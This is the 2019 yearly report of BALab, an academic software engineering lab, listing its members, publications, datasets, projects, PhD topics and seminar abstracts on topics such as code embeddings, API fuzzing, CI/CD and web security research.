BALab yearly reports

Members

Faculty Members

Damianos Chatziantoniou

Maria Kechagia

Dimitris Mitropoulos

Panos (Panagiotis) Louridas

Diomidis Spinellis

Senior Researchers

Zoe Kotti

Vasiliki Efstathiou

Stefanos Georgiou

Thodoris Sotiropoulos

Marios Fragkoulis

Associate Researchers

Charalambos-Ioannis Mitropoulos

Konstantinos Kravvaritis

Stefanos Chaliasos

Antonios Gkortzis

Tushar Sharma

Konstantina Dritsa

Researchers

George Metaxopoulos

Theodosis Tsaklanos

Michael Loukeris

Marios Papachristou

Christos Chatzilenas

Aris Pattakos

Ioannis Batas

Efstathia Chioteli

Nikolas Doureliadis

Vitalis Salis

Overview in numbers

New Publications	Number
Monographs and Edited Volumes	0
PhD Theses	1
Journal Articles	7
Book Chapters	0
Conference Publications	12
Technical Reports	0
White Papers	0
Magazine Articles	0
Working Papers	0
Datasets	5
Total New Publications	25
Projects
New Projects	1
Ongoing Projects	1
Completed Projects	1
Members
Faculty Members	5
Senior Researchers	5
Associate Researchers	6
Researchers	10
Total Members	26
New Members	4
PhDs
Ongoing PhDs	6
Completed PhDs	1
New Seminars
New Seminars	11

New Publications

PhD Theses

Tushar Sharma. Extending maintainability analysis beyond code smells. PhD thesis, Athens University of Economics and Business, Athens, Greece, 2019.

Journal Articles

Diomidis Spinellis and Paris Avgeriou. Evolution of the Unix system architecture: an exploratory case study. IEEE Transactions on Software Engineering, 2019.

Diomidis Spinellis. How to select open source components. IEEE Computer, 42(12):103–106, December 2019.

Vitalis Salis and Diomidis Spinellis. RepoFS: file system view of Git repositories. SoftwareX, 9:288–292, January 2019.

Dimitris Mitropoulos, Panos Louridas, Michalis Polychronakis, and Angelos D. Keromytis. Defending against Web application attacks: approaches, challenges and implications. IEEE Transactions on Dependable and Secure Computing, 16(2):188–203, March 2019.

Stefanos Georgiou and Diomidis Spinellis. Energy-Delay Investigation of Remote Inter-Process Communication Technologies. Journal of Systems and Software, pages 110506, December 2019.

Stefanos Georgiou, Stamatia Rizou, and Diomidis Spinellis. Software development lifecycle for energy efficiency: techniques and tools. ACM Computing Surveys, 54:81:1–81:33, 2019.

Marios Fragkoulis, Diomidis Spinellis, and Panos Louridas. Live interactive queries to a software application's memory profile. IET Software, 13(4):241–248, August 2019.

Conference Publications

Nikolaos Vasilakis, Nancy Pouloudi, Diomidis Spinellis, and Niki Tsouma. Enabling practices for information systems adoption in the complex context of greek e-government. In MCIS 2018: Proceedings of the 12th Mediterranean Conference on Information Systems. September 2019.

Thodoris Sotiropoulos and Benjamin Livshits. Static analysis for asynchronous JavaScript programs. In 33rd European Conference on Object-Oriented Programming, ECOOP '19. 2019.

Tushar Sharma. How deep is the mud: fathoming architecture technical debt using designite. In International Conference on Technical Debt, TechDebt '19. May 2019.

Marios Papachristou. Software clusterings with vector semantics and the call graph. In ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2019), ESEC/FSE Student Research Competition 19. Association for Computing Machinery, August 2019.

Dimitris Mitropoulos, Panos Louridas, Vitalis Salis, and Diomidis Spinellis. Time present and time past: analyzing the evolution of JavaScript code in the wild. In 16th International Conference on Mining Software Repositories: Technical Track, MSR '19. May 2019.

Charalambos Mitropoulos. Employing different program analysis methods to study bug evolution. In ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2019), ESEC/FSE Student Research Competition 19. August 2019.

Michail Loukeris. Efficient computing in a safe environment. In ACM Joint European Software Engineering Conference and Symposium on the Foundations of Software Engineering (ESEC/FSE 2019), ESEC/FSE Student Research Competition 19. August 2019. Student Research Competition award.

Zoe Kotti and Diomidis Spinellis. Standing on shoulders or feet?: the usage of the MSR data papers. In Proceedings of the 16th International Conference on Mining Software Repositories, MSR '19, 565–576. Piscataway, NJ, USA, 2019. IEEE Press. ACM SIGSOFT Distinguished Paper Award.

Antonios Gkortzis, Daniel Feitosa, and Diomidis Spinellis. A double-edged sword? software reuse and potential security vulnerabilities. In Xin Peng, Apostolos Ampatzoglou, and Tanmay Bhowmik, editors, Reuse in the Big Data Era, 187–203. Cham, 2019. Springer International Publishing.

Linos Giannopoulos, Eirini Degkleri, Panayiotis Tsanakas, and Dimitris Mitropoulos. Pythia: identifying dangerous data-flows in Django-based applications. In Proceedings of the 12th Workshop on Systems Security (EuroSec '19), colocated with the 14th European Conference on Computer Systems (EuroSys '19). ACM, March 2019.

Vasiliki Efstathiou and Diomidis Spinellis. Semantic source code models using identifier embeddings. In 16th International Conference on Mining Software Repositories: Data Showcase Track, MSR '19. 2019.

Stefanos Chaliasos, George Metaxopoulos, George Argyros, and Dimitris Mitropoulos. Mime artist: bypassing whitelisting for the web with JavaScript mimicry attacks. In 24th European Symposium on Research in Computer Security, ESORICS '19, 565–585. September 2019.

Datasets

Marios Papachristou. Linux 4.21 call graphs. May 2019.

Dimitris Mitropoulos, Panos Louridas, Vitalis Salis, and Diomidis Spinellis. All Your Script Are Belong to Us: Collecting and Analyzing JavaScript Code from 10K Sites for 9 Months. March 2019.

Antonios Gkortzis, Daniel Feitosa, Paris Avgeriou, and Diomidis Spinellis. Potential security vulnerabilities in open-source reused systems. February 2019.

Vasiliki Efstathiou and Diomidis Spinellis. Source code embeddings. February 2019. https://github.com/vefstathiou/scode-ft-embeddings.

Chioteli Efstathia, Batas Ioannis, and Spinellis Diomidis. Does Unit-Tested Code Crash? A Case Study of Eclipse. January 2019.

Projects

New Projects

FASTEN - Fine-Grained Analysis of Software Ecosystems as Networks

Ongoing Projects

REA - Real Estate Analytics

Completed Projects

CROSSMINER - Developer-Centric Knowledge Mining from Large Open-Source Software Repositories

New Members

Charalambos-Ioannis Mitropoulos

George Metaxopoulos

Theodosis Tsaklanos

Michael Loukeris

Ongoing PhDs

Vaggelis Atlidakis Topic: Structure and Feedback in Cloud Service API Fuzzing

Konstantinos Kravvaritis Topic: Data and Quality Metrics of System Configuration Code

Antonios Gkortzis Topic: Secure Systems on Cloud Computing Infrastructures

Stefanos Georgiou Topic: Energy and Run-Time Performance Practices in Software Engineering

Thodoris Sotiropoulos Topic: Abstractions for software testing

Konstantina Dritsa Topic: Data Science

Completed PhDs

Tushar Sharma Topic: Software Engineering in Enterprise Cloud Applications

Seminars

Semantic Source Code Models Using Identifier Embeddings

Date: 05 April 2019
Presenter: Vasiliki Efstathiou
Abstract

The emergence of online open source repositories in the recent years has led to an explosion in the volume of openly available source code, coupled with metadata that relate to a variety of software development activities. As an effect, in line with recent advances in machine learning research, software maintenance activities are switching from symbolic formal methods to data–driven methods. In this context, the rich semantics hidden in source code identifiers provide opportunities for building semantic representations of code which can assist tasks of code search and reuse. To this end, we deliver in the form of pretrained vector space models, distributed code representations for six popular programming languages, namely, Java, Python, PHP, C, C++, and C#. The models are produced using fastText, a state–of–the–art library for learning word representations. Each model is trained on data from a single programming language; the code mined for producing all models amounts to over 13.000 repositories. We indicate dissimilarities between natural language and source code, as well as variations in coding conventions in between the different programming languages we processed. We describe how these heterogeneities guided the data preprocessing decisions we took and the selection of the training parameters in the released models. Finally, we propose potential applications of the models and discuss limitations of the models.

Standing on Shoulders or Feet? The Usage of the MSR Data Papers

Date: 05 April 2019
Presenter: Zoe Kotti
Abstract

Introduction: The establishment of the Mining Software Repositories (MSR) Data Showcase conference track has encouraged researchers to provide more data sets as a basis for further empirical studies. Objectives: Examine the usage of the data papers published in the MSR proceedings in terms of use frequency, users, and use purpose. Methods: Data track papers were collected from the MSR Data Showcase and through the manual inspection of older MSR proceedings. The use of data papers was established through citation searching followed by reading the studies that have cited them. Data papers were then clustered based on their content, whereas their citations were classified according to the knowledge areas of the Guide to the Software Engineering Body of Knowledge. Results: We found that 65% of the data papers have been used in other studies, with a long-tail distribution in the number of citations. MSR data papers are cited less than other MSR papers. A considerable number of the citations stem from the teams that authored the data papers. Publications providing repository data and metadata are the most frequent data papers and the most often cited ones. Mobile application data papers are the least common ones, but the second most frequently cited. Conclusion: Data papers have provided the foundation for a significant number of studies, but there is room for improvement in their utilization. This can be done by setting a higher bar for their publication, by encouraging their use, and by providing incentives for the enrichment of existing data collections.

Certified Robustness to Adversarial Examples with Differential Privacy

Date: 19 April 2019
Presenter: Vaggelis Atlidakis
Abstract

Adversarial examples that fool machine learning models, particularly deep neural networks, have been a topic of intense research interest, with attacks and defenses being developed in a tight back-and-forth. Most past defenses are best effort and have been shown to be vulnerable to sophisticated attacks. Recently a set of certified defenses have been introduced, which provide guarantees of robustness to norm-bounded attacks, but they either do not scale to large datasets or are limited in the types of models they can support. This paper presents the first certified defense that both scales to large networks and datasets (such as Google’s Inception network for ImageNet) and applies broadly to arbitrary model types. Our defense, called PixelDP, is based on a novel connection between robustness against adversarial examples and differential privacy, a cryptographically-inspired formalism, that provides a rigorous, generic, and flexible foundation for defense.

Why is your flight late? Mining airline data to assess root-causes and impact of delay propagation

Date: 15 May 2019
Presenter: Vaggelis Giannikas
Abstract

Air transportation systems are exposed to daily disruptions, which have significant impact on operations causing not only monetary loss, but also customer dissatisfaction. Airlines operate tight schedules to maximise resource utilisation. However, the lack of sufficient buffers often result in the domino effect, where a delay of a single flight can delay many other dependent flights. Due to the complexity of air transportation systems the task of identifying the cause of a delay is not trivial. In this paper, we propose a framework for automatic detection of root-causes of delays and their propagation effects using airline historical data. The framework is composed of the following: 1) delay propagation model to create connection network, 2) delay network algorithm to find delay networks, and 3) community detection algorithm to identify root-causes and impact of disruptions. We test our framework on historical data of an airline, and show that the airline under study is prone to delay propagation through passenger connections. Additionally, majority of their delays are related to airport capacity, resource allocation, and passengers, and mainly originate from the hub.

Biography

Dr Vaggelis Giannikas is an Associate Professor at the School of Management, University of Bath where he also directs the engineering management teaching portfolio. He is studying the development and evaluation of intelligent logistics systems with applications in manufacturing, warehousing, inventory management and airline networks. A significant part of Vaggelis's research has been conducted in collaboration with corporations in Europe, USA and China. Prior to joining the University of Bath, Vaggelis served as a research associate at the Institute for Manufacturing, University of Cambridge where he was also the associate director of the Cambridge Auto-ID lab. He holds a PhD in Operations Management and Technology from the University of Cambridge and a BSc in Management Science and Technology from the Athens University of Economics and Business.

RESTler: Stateful REST API Fuzzing

Date: 20 May 2019
Presenter: Vaggelis Atlidakis
Abstract

We introduce RESTler, the first stateful REST API fuzzer. RESTler analyzes the API specification of a cloud service and generates sequences of requests that automatically test the service through its API. RESTler generates test sequences by (1) inferring producer-consumer dependencies among request types declared in the specification (e.g., inferring that “a request B should be executed after request A” because B takes as an input a resource-id x produced by A) and by (2) analyzing dynamic feedback from responses observed during prior test executions in order to generate new tests (e.g., learning that “a request C after a request sequence A;B is refused by the service” and therefore avoiding this combination in the future).

We present experimental results showing that these two techniques are necessary to thoroughly exercise a service under test while pruning the large search space of possible request sequences. We used RESTler to test GitLab, a large open-source self-hosted Git service, as well as several Microsoft Azure and Office365 cloud services. RESTler found 28 bugs in Gitlab and several bugs in each of the Azure and Office365 cloud services tested so far. These bugs have been confirmed and fixed by the service owners.

Employing Different Program Analysis Methods to Study Bug Evolution

Date: 20 June 2019
Presenter: Charalambos Mitropoulos
Abstract

The evolution of software bugs has been a well-studied topic in software engineering. We used three different program analysis tools to examine the different versions of two popular sets of programming tools (GNU Binary and Core utilities), and check if their bugs increase of decrease over time. Each tool is based on a different approach, namely: static analysis, symbolic execution, and fuzzing. In this way we can observe potential differences on the kinds of bugs that each tool detects and examine their effectiveness. To do so, we have performed a qualitative analysis on the results. Overall, our results indicate that we cannot say if bugs either decrease or increase over time and that the tools identify different bug types based on the method they follow.

Quality-aware and economics-driven DevOps processes for software services

Date: 25 June 2019
Presenter: Marios Fokaefs
Abstract

Digitization has undoubtedly transformed most markets, including traditional products and tangible commodities to services. In the centre of this transformation lies the software, which is the enabler and the connector behind the adoption of new technologies and the disruption of traditional processes. However, we cannot claim that we understand how software generates value and how we can quantify this value. The first goal of this research is to study the use of software both as a product and as tool, to identify its impact on generating value and revenue, and eventually to formalize this impact in models and processes that will guide the development and the evolution of the software systems according to these goals. Evolution is another challenge in the digital era for both software and services alike. Thanks to technological advancements like the Internet and smart devices, an increasing portion of the population as well as a great number of enterprises have become interconnected with immediate access to vast amounts of information. Besides the great number of connections and the high speed of data production and consumption, this situation is also characterized by its greatly dynamic nature and high volatility. Under these circumstances, software needs to be adjustable, in order to constantly generate value for the company and its clients. From a technical perspective, recent advancements in Software Engineering, like DevOps and self-adaptive systems, have contributed towards adapting software to such dynamic conditions. However, profitability and continuous value generation are not always immediately considered in this setting neither as goals nor as constraints. The economic impact of a software change or the need to also adapt business and economic strategies are assessed after the change and possibly long after it is relevant. For example, consider the extension of a mobile banking app to enable remote bill payments. Is there a way to predict the economic benefits of this feature before it is developed? How accurate will this prediction be? How fast can we roll out the new version including the business planning? Therefore, the second goal of this research is to align the technical and economic goals of software change.

Presenter: I am an Assistant Professor in the Department of Computer and Software Engineering at Polytechnique Montréal. Previously, I was a Postdoctoral Fellow with the Centre of Excellence for Research in Adaptive Systems at York University, Canada, since February 2015 working with Professor Marin Litoiu. I received my Master's and PhD in Software Engineering in January 2015, from the Department of Computing Science at the University of Alberta, Canada under the supervision of Professor Eleni Stroulia. I also hold a BSc since 2008 from the Department of Applied Informatics at the University of Macedonia, Thessaloniki, Greece under the supervision of Professor Alexander Chatzigeorgiou.

How to improve your CI/CD process

Date: 05 July 2019
Presenter: Stefanos Georgiou
Abstract

Continuous integration and deployment are part of the daily process in an industrial environment to boost productivity, reduce bugs, and automate processes. However, if not utilized correctly, it can cost a significant amount of time to test and integrate code changes. In this presentation, we show the effort demanded before and after employing CI/CD practices. Additionally, we show the shortcomings of our first CI/CD pipeline and explain how we optimized it. Moreover, we demonstrate how we improved our development process by incorporating cutting-edge technologies and practices such as Bitrise, Cypress, Docker containers, and Google's Cloud Platform services.

Effective and Efficient API Misuse Detection via Exception Propagation and Search-based Testing

Date: 24 July 2019
Presenter: Maria Kechagia (joint work with Xavier Devroey, Annibale Panichella, Georgios Gousios, Arie van Deursen)
Abstract

Application Programming Interfaces (APIs) typically come with (implicit) usage constraints. The violations of these constraints (API misuses) can lead to software crashes. Even though there are several tools that can detect API misuses, most of them suffer from a very high rate of false positives. We introduce Catcher, a novel API-misuse detection approach that combines static exception propagation analysis with automatic search-based test case generation to effectively and efficiently pinpoint crash-prone API misuses in client applications. We validate Catcher against 21 Java applications, targeting misuses of the Java platform’s API. Our results indicatethat Catcher is able to generate test cases that uncover 243 (unique) API misuses that result in crashes. Our empirical evaluation shows that Catcher can detect a large number of misuses (77 cases) that would remain undetected by the traditional coverage-based test case generator EvoSuite. Additionally, Catcher is on average eight times faster than EvoSuite in generating test cases for the identified misuses. Finally, we find that the majority of the exceptions triggered by Catcher are unexpected to developers i.e., not only unhandled in the source code but also not listed in the documentation of the client applications.

Dr. Maria Kechagia is a research fellow at CREST, UCL. Previously, she was a postdoctoral fellow at the Delft University of Technology and a member of the Software Engineering Research Group. She finished her Ph.D. in Software Engineering in the Department of Management Science and Technology, at the Athens University of Economics and Business, under the supervision of Prof. Diomidis Spinellis. Before that, she pursued her MSc in Computing (Software Engineering) at Imperial College London and her BSc in Management Science and Technology at the Athens University of Economics and Business. Her research interests lie in the areas of software engineering, software verification, crash data analytics, and programming languages. In particular, her current research focuses on combining static analysis and software testing to effectively and efficiently repair API-related bugs in software programs. Her research work has been published in leading peer-reviewed software engineering conferences and journals including ICSE, ISSTA, MSR, EMSE, and JSS.

Mime artist: Bypassing whitelisting for the Web with JavaScript mimicry attacks

Date: 13 September 2019
Presenter: Stefanos Chaliasos
Abstract

Despite numerous efforts to mitigate Cross-Site Scripting (XSS) attacks, XSS remains one of the most prevalent threats to modern web applications. Recently, a number of novel XSS patterns, based on code-reuse and obfuscated payloads, were introduced to bypass different protection mechanisms such as sanitization frameworks, web application firewalls, and the Content Security Policy (CSP). Nevertheless, a class of script-whitelisting defenses that perform their checks inside the JavaScript engine of the browser, remains effective against these new patterns. We have evaluated the effectiveness of whitelisting mechanisms for the web by introducing “JavaScript mimicry attacks”. The concept behind such attacks is to use slight transformations (i.e. changing the leaf values of the abstract syntax tree) of an application’s benign scripts as attack vectors, for malicious purposes. Our proof-of-concept exploitations indicate that JavaScript mimicry can bypass script-whitelisting mechanisms affecting either users (e.g. cookie stealing) or applications (e.g. cryptocurrency miner hijacking). Furthermore, we have examined the applicability of such attacks at scale by performing two studies: one based on popular application frameworks (e.g. WordPress) and the other focusing on scripts coming from Alexa’s top 20 websites. Finally, we have developed an automated method to help researchers and practitioners discover mimicry scripts in the wild. To do so, our method employs symbolic analysis based on a lightweight weakest precondition calculation.

Engineering Dynamic Cyber-Physical Spaces

Date: 19 September 2019
Presenter: Christos Tsigkanos
Abstract

Computing and communication capabilities are increasingly being embedded into physical spaces blurring the boundary between computational and physical worlds; typically, this is the case in modern cyber-physical or internet-of-things (IoT) systems. Conceptually, such composite environments can be abstracted into a topological model where computational and physical entities are connected in a graph structure, yielding a cyber-physical space. Like any other software-intensive system, such a space is highly dynamic and typically undergoes continuous change - it is evolving. This brings a manifold of challenges as dynamics may affect e.g. safety, security, or reliability requirements. Modelling space and its dynamics as well as supporting formal reasoning about various properties of an evolving space, are crucial prerequisites for engineering dependable space-intensive systems, e.g. to assure requirements satisfaction or to trigger correct adaptation.

This talk will show an avenue for research which can be characterized as rethinking spatial environments from a software engineering perspective -- in both design and operation aspects. Regarding design, we will see how domain descriptions can give rise to models amenable to automated analyses of dynamic behaviours on spaces populated with humans, robots, or mobile devices. Analysis amounts to assessing if some collective behaviour that is highly space-dependent, violates certain requirements that the overall system should exhibit. Regarding runtime, we will consider supporting analyses on the cloud on behalf of resource-constrained and spatially-distributed IoT devices. We will discuss how spatial verification processes can be integrated in the service layer of an IoT-cloud architecture based on microservices, and what tradeoffs emerge across different deployment options.

Christos Tsigkanos is university assistant at the Technical University of Vienna. Previously, he was post-doctoral researcher at Politecnico di Milano, Italy where he received (2017) his PhD defending a thesis entitled ”Modelling and Verification of Evolving Cyber-Physical Spaces” (advisor prof. Carlo Ghezzi). His research interests lie in the intersection of dependable systems and formal aspects of software engineering, and include security and privacy in distributed, self-adaptive and cyber-physical systems, requirements engineering and formal verification.

Note: Data before 2017 may refer to grandparented work conducted by BALab's members at its progenitor laboratory, ISTLab.

Yearly Report 2019